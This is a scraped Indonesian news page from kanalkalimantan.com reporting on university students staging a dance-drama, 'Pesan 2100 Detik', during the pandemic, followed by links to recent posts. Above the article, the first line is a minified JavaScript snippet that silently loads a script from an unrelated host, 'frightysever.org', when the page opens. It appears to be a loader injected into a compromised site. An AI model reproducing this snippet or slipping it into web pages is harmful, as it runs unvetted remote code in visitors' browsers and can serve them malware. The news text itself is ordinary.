(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Seni Budaya

‘Pesan 2100 Detik’ Jadi Garapan Baru Mahasiswa Sendratasik ULM


KANALKALIMANTAN.COM, BANJARMASIN – Mahasiswa Program Studi (Prodi) Pendidikan Seni Drama, Tari dan Musik (Sendratasik) FKIP Universitas Lambung Mangkurat (ULM), kembali melaunchig karya drama tari berjudul ‘Pesan 2100 Detik’.

Kegiatan ini akan ditayangkan pertengahan Maret ini, secara virtual melalui channel youtube Sendratasik Berkarya 10.
Muhammad Ridhoni (20), ketua pelaksana kegiatan, mengatakan karya tersebut bercerita tentang kesadaran manusia terhadap Allah SWT.

“Ya kalau secara garis besar, menceritakan pesan rasa bersyukur dan ingat akan Tuhan,” ujar pemuda yang kerap disapa Doni, saat diwawancara kanalkalimantan.com, Jumat (5/3/2021) malam.

Doni menambahkan, kegiatan ini digarap oleh mahasiswa Prodi Sendratasik, terutama angkatan tahun 2017 dan 2018 guna memenuhi nilai ujian mata kuliah Managemen Pagelaran Seni dan mata Kuliah Pagelaran seni.

“Selama mahasiswa yang bersangkutan menjalani kegiatan ini sepenuhnya dengan baik, itu sudah bisa dipastikan lulus dalam mata kuliah tersebut,” ucap Doni.
Doni juga mengungkapkan, kegiatan ini digarap selama kurang lebih 3 bulan. Ia mengakui, penggarapannya sempat terkendala masalah perizinan latihannya, karena masih dalam kondisi pandemi Covid-19.

“Karena dalam kegiatan ini melibatkan kurang lebih 40 orang mahasiswa prodi sendratasik. Jadi agak susah mendapatkan ijinnya kalo melibatkan orang banyak,” ungkapnya.
“Walau begitu, kita tetap mengusahakan untuk tetap latihan, sesuai dengan aturan di kampus dan juga pastinya sesuai protokol kesehatan,” tambahnya.

Ia berharap karya tersebut akan dapat dinikmati publik Kalsel. “bagi yang penasaran tanggal dan jam tayang yang pastinya, terus postingan Instagram Sendratasikberkaryake10,” pungkasnya. (Kanalkalimantan.com/Tius)

 

Reporter : Tius
Editor : Cell

 


Al Ghifari

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

10 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

13 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

13 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

15 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

17 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

18 jam ago

This website uses cookies.